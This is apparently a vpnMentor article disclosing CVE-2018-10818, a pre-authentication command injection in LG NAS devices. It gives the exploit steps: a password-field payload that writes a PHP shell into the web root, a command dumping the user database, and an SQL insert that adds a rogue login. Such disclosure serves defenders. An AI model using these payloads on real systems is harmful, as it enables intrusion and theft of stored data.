Critical Vulnerability Found in Majority of LG NAS Devices

Here at vpnMentor, we are concerned about your security and privacy. Our special team of hackers & researchers roam the internet to find security issues in sensitive products. We found this remote command execution vulnerability in the majority of LG NAS devices. Read more to find out how we exploited this vulnerability and what you can do about it.

Vulnerability Found in a Majority of LG NAS Devices


We conducted a comprehensive assessment on an LG NAS device. This device is a storage device connected to a network that only allows authorized users. It’s like a private cloud, only it costs less, is simple to operate, and it gives you complete control. However, we found a way to hack into the system using a pre-authenticated remote command injection vulnerability (CVE-2018-10818), which can then allow us to do virtually everything including access the data and tamper with the user data and content. 


The vulnerability (CVE-2018-10818) is a pre-auth remote command injection vulnerability found in the majority of LG NAS devices.

You cannot simply log in with any random username and password. However, there lies a command injection vulnerability in the “password” parameter (you have to use an interceptor like burp). We can simply trigger this bug by adding to it. To add a new user, we can simply write a persistent shell called c.php by using:
;echo “” > /tmp/x2;sudo mv /tmp/x2 /var/www/c.php
Entering it as a password exploits the vulnerability.

Then, by passing the following command, we can “dump” the users:
echo “.dump user” | sqlite3 /etc/nas/db/share.db
Dumping means reading all database data. We dump the database so we can see the users’ usernames and passwords. This also lets us add our own.

To add a new user into the database, we need to generate a valid MD5. We can use the included MD5 tool to create a hash with the username “test” and the password “1234.”
sudo nas-common md5 1234
Once we have a valid password and username, we can add it to the database with the following:
INSERT INTO “user” VALUES(‘test’,’md5_hash’,’Vuln Test’,’test@localhost’,’’);
After this is complete, we can log in to the LG Network Storage with the username test and the password 1234.

This gives us access to the system as an authorized user. From here we can access any data or classified files that are stored on the LAS device.


  • Be aware that LAS devices can be hacked and exploited.
  • Contact LG and let them know about this vulnerability and demand they fix it.
  • Warn your friends on facebook (here’s a link), or twitter (click to tweet)
Privacy Alert!

Your data is exposed to the websites you visit!

Your IP Address:

Your Location:

Your Internet Provider:

The information above can be used to track you, target you for ads, and monitor what you do online.

VPNs can help you hide this information from websites so that you are protected at all times. We recommend NordVPN — the #1 VPN out of over 350 providers we've tested. It has military-grade encryption and privacy features that will ensure your digital security, plus — it's currently offering 68% off.

Privacy Alert box - content - Popular posts

Visit NordVPN

Was this helpful? Share it!
Did you like this article? Rate it!
I hated it! I don't really like it It was ok Pretty good! Loved it!
Voted by Users
Comment Comment must be from 5 to 2500 characters long.
Thank you for your feedback